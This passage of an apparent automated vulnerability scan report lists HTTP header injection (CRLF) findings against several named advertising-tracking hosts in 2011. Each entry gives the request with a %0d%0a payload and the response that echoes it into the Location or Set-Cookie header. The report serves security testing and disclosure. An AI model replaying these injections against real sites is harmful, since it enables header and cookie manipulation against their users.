GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=d0f4f%0d%0a6e008c98e33&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?d0f4f
6e008c98e33

Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:40 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?d0f4f
6e008
...[SNIP]...

1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_rurl request parameter is copied into the Location response header. The payload b10dd%0d%0a3788128dbfd was submitted in the RL_rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=b10dd%0d%0a3788128dbfd&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:37 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: b10dd
3788128dbfd
?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 571
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:29 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="b10dd
3788128dbfd?scid=2323693&amp;cid=837045&
...[SNIP]...

1.7. http://udmserve.net/udm/img.fetch [dt cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The value of the dt cookie is copied into the Set-Cookie response header. The payload 6ab88%0d%0a0adc77508cd was submitted in the dt cookie. This caused a response containing an injected HTTP header.

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=9173:1:63440343934:1:2900:0:0:63440343934:1:1|; dt=6ab88%0d%0a0adc77508cd; __qca=P0-679846959-1315331134624

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440344253:14:2900:0:0:63440344253:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:50:53 GMT
Set-Cookie: dt=6ab88
0adc77508cd
; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12: 50:53 GMT
Expires: Mon, 05 Sep 2011 12:50:53 GMT
Date: Tue, 06 Sep 2011 12:50:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...

1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Bottom_facebook.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2516f%0d%0a0b50936584 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2516f%0d%0a0b50936584/Bottom_facebook.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/2516f
0b50936584
/Bottom_facebook.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:13 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/2516f
0b50936584/Bottom_facebo
...[SNIP]...

1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_CSportalHead.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54340%0d%0a57bb639a64e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54340%0d%0a57bb639a64e/Rsidepanel_CSportalHead.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Location: http://utdi.com/54340
57bb639a64e
/Rsidepanel_CSportalHead.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/54340
57bb639a64e/Rsidepanel_C
...[SNIP]...

1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-contact.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ae4cb%0d%0a0096e3364fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /imagesae4cb%0d%0a0096e3364fc/Rsidepanel_ID-contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/imagesae4cb
0096e3364fc
/Rsidepanel_ID-contact.jpg
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/imagesae4cb
0096e3364fc/Rsidep
...[SNIP]...

1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-pr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3eb55%0d%0aefef98aca08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images3eb55%0d%0aefef98aca08/Rsidepanel_ID-pr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/images3eb55
efef98aca08
/Rsidepanel_ID-pr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images3eb55
efef98aca08/Rsidep
...[SNIP]...

1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cbce7%0d%0a95d968751a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cbce7%0d%0a95d968751a4/Rsidepanel_ID-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/cbce7
95d968751a4
/Rsidepanel_ID-specials.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/cbce7
95d968751a4/Rsidepanel_I
...[SNIP]...

1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDI-G.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ca126%0d%0a0d553889d45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ca126%0d%0a0d553889d45/Rsidepanel_UTDI-G.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/ca126
0d553889d45
/Rsidepanel_UTDI-G.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ca126
0d553889d45/Rsidepanel_U
...[SNIP]...

1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDiStore.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36ce5%0d%0aa169a199146 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36ce5%0d%0aa169a199146/Rsidepanel_UTDiStore.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/36ce5
a169a199146
/Rsidepanel_UTDiStore.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36ce5
a169a199146/Rsidepanel_U
...[SNIP]...

1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_btm.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ea78%0d%0a6eb580edc8f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ea78%0d%0a6eb580edc8f/Rsidepanel_btm.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/8ea78
6eb580edc8f
/Rsidepanel_btm.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_b
...[SNIP]...

1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fa623%0d%0a91d1427d552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fa623%0d%0a91d1427d552/Rsidepanel_mid-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/fa623
91d1427d552
/Rsidepanel_mid-specials.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fa623
91d1427d552/Rsidepanel_m
...[SNIP]...

1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cffb%0d%0ae67eb0e78d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7cffb%0d%0ae67eb0e78d0/Rsidepanel_mid.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/7cffb
e67eb0e78d0
/Rsidepanel_mid.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_m
...[SNIP]...

1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/back-front.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d3b2%0d%0a658a9609ca0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d3b2%0d%0a658a9609ca0/back-front.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
